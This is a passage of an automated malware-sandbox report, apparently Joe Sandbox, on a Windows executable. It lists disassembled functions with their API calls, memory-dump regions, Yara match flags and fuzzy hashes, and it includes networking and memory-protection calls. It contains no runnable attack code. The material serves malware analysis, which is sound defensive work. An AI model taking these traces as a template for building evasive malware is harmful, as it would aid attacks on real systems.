                                                                  • Associated: 00000000.00000002.2113980276.0000000002275000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2113980276.0000000002282000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2260000_ExeFile (233).jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ExitProcess
                                                                  • String ID:
                                                                  • API String ID: 621844428-0
                                                                  • Opcode ID: d3fab1d135a5a4648cf58a609ccfeed82b988a241aecbaa36631449b31c14e0e
                                                                  • Instruction ID: b03b40f21b5c3f8296bc5cf91cd02c77bfd1f1ba3d9d7d54db3281bd4f28f296
                                                                  • Opcode Fuzzy Hash: d3fab1d135a5a4648cf58a609ccfeed82b988a241aecbaa36631449b31c14e0e
                                                                  • Instruction Fuzzy Hash: 3DD0C927B62301A6E600AAF078ADB3A35575FA0A44F009819E5159A28CEE6088624AD1
                                                                  Function 0041CDD7 Relevance: 1.6, APIs: 1, Instructions: 149COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: H_prolog
                                                                  • String ID:
                                                                  • API String ID: 3519838083-0
                                                                  • Opcode ID: e2d040b58d2e732b0d0dcea39a807528dcdbe6e0a658436ef4808abc9a245d1d
                                                                  • Instruction ID: 86b6000765a73317fef6ebdd1d3f7835681af8542c8e3a940374cd9bb61a5516
                                                                  • Opcode Fuzzy Hash: e2d040b58d2e732b0d0dcea39a807528dcdbe6e0a658436ef4808abc9a245d1d
                                                                  • Instruction Fuzzy Hash: 145173319402049FCB14DBA9CCC09EEB7F9EF49324F24452BE512E76D0D778A985CBA9
                                                                  Function 021F1D10 Relevance: 1.6, APIs: 1, Instructions: 112COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2113850461.00000000021F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 021F1000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_21f1000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 296c11db14dd46904e722935a9da397ec8c57e6725c6a21711c9545b8e4c59d2
                                                                  • Instruction ID: e4c131b897a3fcead199d08bcb87b66aa7ad4c3052855cee646d444ddd4de67e
                                                                  • Opcode Fuzzy Hash: 296c11db14dd46904e722935a9da397ec8c57e6725c6a21711c9545b8e4c59d2
                                                                  • Instruction Fuzzy Hash: 2A410975A40109EFDB48CF44C494BAAB7B2FF88314F24C199E9295F355D772EA82CB80
                                                                  Function 02266FB0 Relevance: 1.6, APIs: 1, Instructions: 107libraryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • LoadLibraryW.KERNELBASE(00000000,?,2564BE4F,022668DC), ref: 022670F2
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2113956187.0000000002261000.00000020.00001000.00020000.00000000.sdmp, Offset: 02260000, based on PE: true
                                                                  • Associated: 00000000.00000002.2113944941.0000000002260000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2113968818.000000000226D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2113980276.0000000002270000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2113980276.0000000002275000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2113980276.0000000002282000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2260000_ExeFile (233).jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: LibraryLoad
                                                                  • String ID:
                                                                  • API String ID: 1029625771-0
                                                                  • Opcode ID: c3057499af352d91fb1a3178de4aae296ca75a1cefb17f38448a5921e24e51ae
                                                                  • Instruction ID: ea4ceabd6f315ec7c1d00b63b9c8f07c686c5cd70eb32c3706c9ef83251cc1b0
                                                                  • Opcode Fuzzy Hash: c3057499af352d91fb1a3178de4aae296ca75a1cefb17f38448a5921e24e51ae
                                                                  • Instruction Fuzzy Hash: 4331C8377342025F9924A6E9749C33BA15BD784648F64485AF003CB34CDEA9CCC14BE3
                                                                  Function 02266F10 Relevance: 1.5, APIs: 1, Instructions: 45libraryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • LoadLibraryW.KERNELBASE(00000000,?,2564BE4F,0226704F,022668DC), ref: 02266F40
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2113956187.0000000002261000.00000020.00001000.00020000.00000000.sdmp, Offset: 02260000, based on PE: true
                                                                  • Associated: 00000000.00000002.2113944941.0000000002260000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2113968818.000000000226D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2113980276.0000000002270000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2113980276.0000000002275000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2113980276.0000000002282000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2260000_ExeFile (233).jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: LibraryLoad
                                                                  • String ID:
                                                                  • API String ID: 1029625771-0
                                                                  • Opcode ID: 22117a57f2c37ddb0e1c410c05554810ba8f25f45c700d5a6f405df4d21d9df6
                                                                  • Instruction ID: 0c009e082aba6111fe3fae39d56b6cec76ca04d6b9ed3612864f7bdba00cbef6
                                                                  • Opcode Fuzzy Hash: 22117a57f2c37ddb0e1c410c05554810ba8f25f45c700d5a6f405df4d21d9df6
                                                                  • Instruction Fuzzy Hash: 49014477B11201AF9754FBF5B49C63B269B5BC0654B044CA9F005C7348EE749C514BE1
                                                                  Function 00429CA6 Relevance: 1.5, APIs: 1, Instructions: 39COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog.LIBCMT ref: 00429CAB
                                                                    • Part of subcall function 004299F1: TlsAlloc.KERNEL32(?,00429CD5,76230A60,00000000,?,004295E3,00428940,004295FF,0041F399,00425BC8,76230A60,00000000,?,0040E996,00000000), ref: 00429A13
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: AllocH_prolog
                                                                  • String ID:
                                                                  • API String ID: 3910492588-0
                                                                  • Opcode ID: 391db097ecbc7f2e887088de165df358eb552572bb53b512a5a088e6feeae371
                                                                  • Instruction ID: e3d1adaf2064881ac0a353d79633cd097c0c2aad4d25d7745887e64319261521
                                                                  • Opcode Fuzzy Hash: 391db097ecbc7f2e887088de165df358eb552572bb53b512a5a088e6feeae371
                                                                  • Instruction Fuzzy Hash: F4016D35B20112DBDB29AF66F81166E77A2EBD6325F50453FE582D3390DB788C04CB98
                                                                  Function 021F27B0 Relevance: 1.5, APIs: 1, Instructions: 14COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2113850461.00000000021F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 021F1000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_21f1000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: ExitProcess
                                                                  • String ID:
                                                                  • API String ID: 621844428-0
                                                                  • Opcode ID: 9c44a7ce0103fbbf5f64b070ec749cd0cf775249d9d4a793d843660978a222af
                                                                  • Instruction ID: e9333b6b1f0cb577e31a058f55fc8892b6440b0cafaad97ce58ae9a5fd8b56e1
                                                                  • Opcode Fuzzy Hash: 9c44a7ce0103fbbf5f64b070ec749cd0cf775249d9d4a793d843660978a222af
                                                                  • Instruction Fuzzy Hash: 6BD09EB4D80208FFD780EFA4E946B9DBBB4EB04702F108165EA29A7644E7715A148F56
                                                                  Function 021F1820 Relevance: 1.3, APIs: 1, Instructions: 11COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • VirtualFree.KERNELBASE(?,?,?), ref: 021F182F
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2113850461.00000000021F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 021F1000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_21f1000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: FreeVirtual
                                                                  • String ID:
                                                                  • API String ID: 1263568516-0
                                                                  • Opcode ID: 5c273d823698085263809707435d3a4d18e0bdafb60f529b1abdf4c867f6cda8
                                                                  • Instruction ID: 261ca9a0cdc670f9cb6e16334f73c335e60a03c1f083cf9c3855c0dd7ea435e4
                                                                  • Opcode Fuzzy Hash: 5c273d823698085263809707435d3a4d18e0bdafb60f529b1abdf4c867f6cda8
                                                                  • Instruction Fuzzy Hash: 29C04CBA55424CAB8B44DF98E884DAB77EDBB8C610B048549BA2D87604C630F9508BA4

                                                                  Non-executed Functions

                                                                  Function 00424A99 Relevance: 15.1, APIs: 10, Instructions: 102stringfileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog.LIBCMT ref: 00424A9E
                                                                  • GetFullPathNameA.KERNEL32(?,00000104,?,?,?,?,?), ref: 00424AC8
                                                                  • lstrcpynA.KERNEL32(?,?,00000104,?,?,?), ref: 00424AD9
                                                                    • Part of subcall function 00424A57: lstrcpynA.KERNEL32(00000000,?,00000104,?,?,?), ref: 00424A7C
                                                                    • Part of subcall function 00424A57: PathStripToRootA.SHLWAPI(00000000,?,?,?), ref: 00424A83
                                                                  • PathIsUNCA.SHLWAPI(?,?,?,?,?,?), ref: 00424B0E
                                                                  • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,?,?,00000000,00000000,?,?,?), ref: 00424B32
                                                                  • CharUpperA.USER32(?,?,?,?), ref: 00424B4A
                                                                  • FindFirstFileA.KERNEL32(?,?,?,?,?), ref: 00424B63
                                                                  • FindClose.KERNEL32(00000000,?,?,?), ref: 00424B6F
                                                                  • lstrlenA.KERNEL32(?,?,?,?), ref: 00424B8C
                                                                  • lstrcpyA.KERNEL32(?,?,?,?,?), ref: 00424BAB
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: Path$Findlstrcpyn$CharCloseFileFirstFullH_prologInformationNameRootStripUpperVolumelstrcpylstrlen
                                                                  • String ID:
                                                                  • API String ID: 4080879615-0
                                                                  • Opcode ID: 0673f5eb62677d010cc7cd393616d49ad2b116331357cec368046e2544c01408
                                                                  • Instruction ID: 4b06695585c640ab3fe26250615955364903dab726ca119cf8fbbfb20b083b72
                                                                  • Opcode Fuzzy Hash: 0673f5eb62677d010cc7cd393616d49ad2b116331357cec368046e2544c01408
                                                                  • Instruction Fuzzy Hash: F1317531700128EBDB219FA5EC88BEEBBBCEF84355F4045A6F515E6250C7389E858B58
                                                                  Function 00418CFE Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 134COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _TranslateName.LIBCMT ref: 00418D59
                                                                  • _TranslateName.LIBCMT ref: 00418DA2
                                                                  • IsValidCodePage.KERNEL32(00000000,00000082,?,0043C8F0,00415C9D,?,0043F8E8,?), ref: 00418E06
                                                                  • IsValidLocale.KERNEL32(00000001), ref: 00418E1C
                                                                  • _strcat.LIBCMT ref: 00418E5F
                                                                    • Part of subcall function 00418BEC: _strlen.LIBCMT ref: 00418BF2
                                                                    • Part of subcall function 00418BEC: EnumSystemLocalesA.KERNEL32(00418802,00000001,?,0043C8F0,00415C9D,?,0043F8E8,?), ref: 00418C0C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: NameTranslateValid$CodeEnumLocaleLocalesPageSystem_strcat_strlen
                                                                  • String ID: 8:C$Norwegian-Nynorsk
                                                                  • API String ID: 4291917928-2144728078
                                                                  • Opcode ID: 574a487d4df5138f39aaf0a3a251f485e9dbddddad8006a7e9d6517df36a9767
                                                                  • Instruction ID: 2c2c8765f4b236233be1cdb350641c934f88d795d8981d40c2d079dedaed01f1
                                                                  • Opcode Fuzzy Hash: 574a487d4df5138f39aaf0a3a251f485e9dbddddad8006a7e9d6517df36a9767
                                                                  • Instruction Fuzzy Hash: 6A4185B1B41340BBDB30AB61AC81BEB37A5AF65700B15143FE545D62F1DF3988C9862E
                                                                  Function 00414AE3 Relevance: 12.2, APIs: 8, Instructions: 212timeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __lock.LIBCMT ref: 00414AF6
                                                                    • Part of subcall function 004108E8: EnterCriticalSection.KERNEL32(?,?,?,00410723,00000004,00431B20,00000010,0041200F,00000001,0000008C,?,00431A70,00000060), ref: 00410910
                                                                  • _strlen.LIBCMT ref: 00414B68
                                                                  • _strcat.LIBCMT ref: 00414B85
                                                                  • _strncpy.LIBCMT ref: 00414B9E
                                                                    • Part of subcall function 0040E502: __lock.LIBCMT ref: 0040E520
                                                                    • Part of subcall function 0040E502: HeapFree.KERNEL32(00000000,?,00431A60,0000000C,004108CC,00000000,00431B30,00000008,00410901,?,?,?,00410723,00000004,00431B20,00000010), ref: 0040E567
                                                                  • GetTimeZoneInformation.KERNEL32(0043F808,00432298,00000018,004150F8,004322A8,00000008,0040F746,?,?,0000003C,00000000,?,?,0000003C,00000000,?), ref: 00414C07
                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,0043F80C,000000FF,0000003F,00000000,?,?,0000003C,00000000,?,?,0000003C,00000000,?,?), ref: 00414C95
                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,0043F860,000000FF,0000003F,00000000,?,?,0000003C,00000000,?,?,0000003C,00000000,?,?), ref: 00414CC9
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: ByteCharMultiWide__lock$CriticalEnterFreeHeapInformationSectionTimeZone_strcat_strlen_strncpy
                                                                  • String ID:
                                                                  • API String ID: 3757401926-0
                                                                  • Opcode ID: a12a00952cfbe2cbfe0e02be742bc80dcd0c2f8750305a48b7d58f6abd9f11fa
                                                                  • Instruction ID: b88b56355e109a379969b639f8961749b468b39d063f6cbed0312a5d21008a68
                                                                  • Opcode Fuzzy Hash: a12a00952cfbe2cbfe0e02be742bc80dcd0c2f8750305a48b7d58f6abd9f11fa
                                                                  • Instruction Fuzzy Hash: 1B7137319042419EDB28AF29FC85B967BE5E785310F64253BE850E72E1E73C48C2CB5D
                                                                  Function 0041B3F3 Relevance: 9.1, APIs: 6, Instructions: 102COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetLocaleInfoW.KERNEL32(00000000,00000001,00000000,00000000,00433B40,00000018,0041A0FB,?,?,?,00000080,00000000,?,?,00000001), ref: 0041B410
                                                                  • GetLastError.KERNEL32(?,?,00000001), ref: 0041B422
                                                                  • GetLocaleInfoW.KERNEL32(00000001,?,00000000,00000000,00433B40,00000018,0041A0FB,?,?,?,00000080,00000000,?,?,00000001), ref: 0041B46D
                                                                  • GetLocaleInfoW.KERNEL32(00000001,?,?,00000000,?,?,00000001), ref: 0041B4DC
                                                                  • WideCharToMultiByte.KERNEL32(?,00000000,?,000000FF,?,?,00000000,00000000,?,00000000,?,?,00000001), ref: 0041B4FE
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: InfoLocale$ByteCharErrorLastMultiWide
                                                                  • String ID:
                                                                  • API String ID: 97497842-0
                                                                  • Opcode ID: ec53c0ac90a504556e3c511ba40ffa224ed2ccbe603bfc9167057ac1e3787858
                                                                  • Instruction ID: bfaabb92e0a3a5bf762b7feaf1de5f82b449aebafdeaeb8c174feb8ae06c27e5
                                                                  • Opcode Fuzzy Hash: ec53c0ac90a504556e3c511ba40ffa224ed2ccbe603bfc9167057ac1e3787858
                                                                  • Instruction Fuzzy Hash: B3318D70901229FBCF218F91DD459EF7F75EF09764B20812AF411A6262C7388A91DBE9
                                                                  Function 0041B2C3 Relevance: 9.1, APIs: 6, Instructions: 97COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetLocaleInfoW.KERNEL32(00000000,00000001,00000000,00000000,00433B30,00000018,0041A1AF,?,?,0043F978,00000004,00000000,?,?,00000001), ref: 0041B2E0
                                                                  • GetLastError.KERNEL32(?,?,00000001), ref: 0041B2F2
                                                                  • GetLocaleInfoW.KERNEL32(00000001,?,?,?,00433B30,00000018,0041A1AF,?,?,0043F978,00000004,00000000,?,?,00000001), ref: 0041B31C
                                                                  • GetLocaleInfoA.KERNEL32(00000001,?,00000000,00000000,00433B30,00000018,0041A1AF,?,?,0043F978,00000004,00000000,?,?,00000001), ref: 0041B34B
                                                                  • GetLocaleInfoA.KERNEL32(00000001,?,?,?,?,?,00000001), ref: 0041B3B2
                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,000000FF,?,?,?,?,?,?,00000001), ref: 0041B3D2
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: InfoLocale$ByteCharErrorLastMultiWide
                                                                  • String ID:
                                                                  • API String ID: 97497842-0
                                                                  • Opcode ID: 4f91be03a2c579940054dd89145ab35aa975abc4abe92bc42905e97746423a69
                                                                  • Instruction ID: ba34957b19bfa83a15de8861c2d6b5f59c3863597e2d4372a0d3dd5a209f6675
                                                                  • Opcode Fuzzy Hash: 4f91be03a2c579940054dd89145ab35aa975abc4abe92bc42905e97746423a69
                                                                  • Instruction Fuzzy Hash: 48317E7090061DEBCF229F55DD459EF7B75FF48354B24412BF821A2260D33889A1DB99
                                                                  Function 00403550 Relevance: 9.1, APIs: 6, Instructions: 67windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • IsIconic.USER32(?), ref: 0040355A
                                                                    • Part of subcall function 004262F7: __EH_prolog.LIBCMT ref: 004262FC
                                                                    • Part of subcall function 004262F7: BeginPaint.USER32(?,?,?,?,0041FE9A), ref: 0042632A
                                                                  • SendMessageA.USER32(?,00000027,?,00000000), ref: 00403581
                                                                  • GetSystemMetrics.USER32(0000000B), ref: 0040358F
                                                                  • GetSystemMetrics.USER32(0000000C), ref: 00403595
                                                                  • GetClientRect.USER32(?,?), ref: 004035A2
                                                                  • DrawIcon.USER32(?,?,?,?), ref: 004035DA
                                                                    • Part of subcall function 00426352: __EH_prolog.LIBCMT ref: 00426357
                                                                    • Part of subcall function 00426352: EndPaint.USER32(?,?,?,?,0041FEC0,?), ref: 00426374
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: H_prologMetricsPaintSystem$BeginClientDrawIconIconicMessageRectSend
                                                                  • String ID:
                                                                  • API String ID: 1530917984-0
                                                                  • Opcode ID: f17d443d2831e9e86dea4b6b252fb4e05b77bb08401c64c5df8ed99b70b6788c
                                                                  • Instruction ID: c95341d9d7590c9a11ddb044179971413f278dffb205523bc6025f8df687dda5
                                                                  • Opcode Fuzzy Hash: f17d443d2831e9e86dea4b6b252fb4e05b77bb08401c64c5df8ed99b70b6788c
                                                                  • Instruction Fuzzy Hash: 841160B13143019FD224EF7DDC99D5B77A9ABC8214F444A2DF586C3290DA34E8068A65
                                                                  Function 00403600 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 100timeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 004215CD: __EH_prolog.LIBCMT ref: 004215D2
                                                                    • Part of subcall function 00423C70: GetDlgItem.USER32(?,?), ref: 00423C7D
                                                                    • Part of subcall function 00423DD5: EnableWindow.USER32(?,?), ref: 00423DE2
                                                                  • SetTimer.USER32(?,00000001,00000001,00000000), ref: 004036BE
                                                                  • listen.WS2_32(?,00000005), ref: 004036FC
                                                                  • SetTimer.USER32(?,00000001,00000001,00000000), ref: 0040370C
                                                                    • Part of subcall function 0042C0CB: __EH_prolog.LIBCMT ref: 0042C0D0
                                                                    • Part of subcall function 0042C0CB: inet_addr.WS2_32(?), ref: 0042C10F
                                                                    • Part of subcall function 0042C0CB: gethostbyname.WS2_32(?), ref: 0042C120
                                                                    • Part of subcall function 0042C0CB: htons.WS2_32(?), ref: 0042C137
                                                                  • SetTimer.USER32(?,00000001,00000001,00000000), ref: 0040372C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: Timer$H_prolog$EnableItemWindowgethostbynamehtonsinet_addrlisten
                                                                  • String ID: Busy now
                                                                  • API String ID: 1258581902-130138695
                                                                  • Opcode ID: fce8c989688a1dac9d09d51dfa971bfc43fe77928b07dafcd80c6029d8334aa1
                                                                  • Instruction ID: 6490c2d23ba4975c4b10ba10ff6ed106fbde2c758548d969700f79071d26b33c
                                                                  • Opcode Fuzzy Hash: fce8c989688a1dac9d09d51dfa971bfc43fe77928b07dafcd80c6029d8334aa1
                                                                  • Instruction Fuzzy Hash: FC31243139072077E9356B72AC97FAE22A65B84B15F40051DB206AF1C1DEADBA41874C
                                                                  Function 0040E573 Relevance: 7.6, APIs: 5, Instructions: 92memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040E58D
                                                                  • GetSystemInfo.KERNEL32(?,?,?,0000001C), ref: 0040E59E
                                                                  • VirtualQuery.KERNEL32(?,?,0000001C,?,?,0000001C), ref: 0040E5E4
                                                                  • VirtualAlloc.KERNEL32(?,?,00001000,00000004,?,?,0000001C), ref: 0040E622
                                                                  • VirtualProtect.KERNEL32(?,?,00000002,?,?,?,0000001C), ref: 0040E648
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
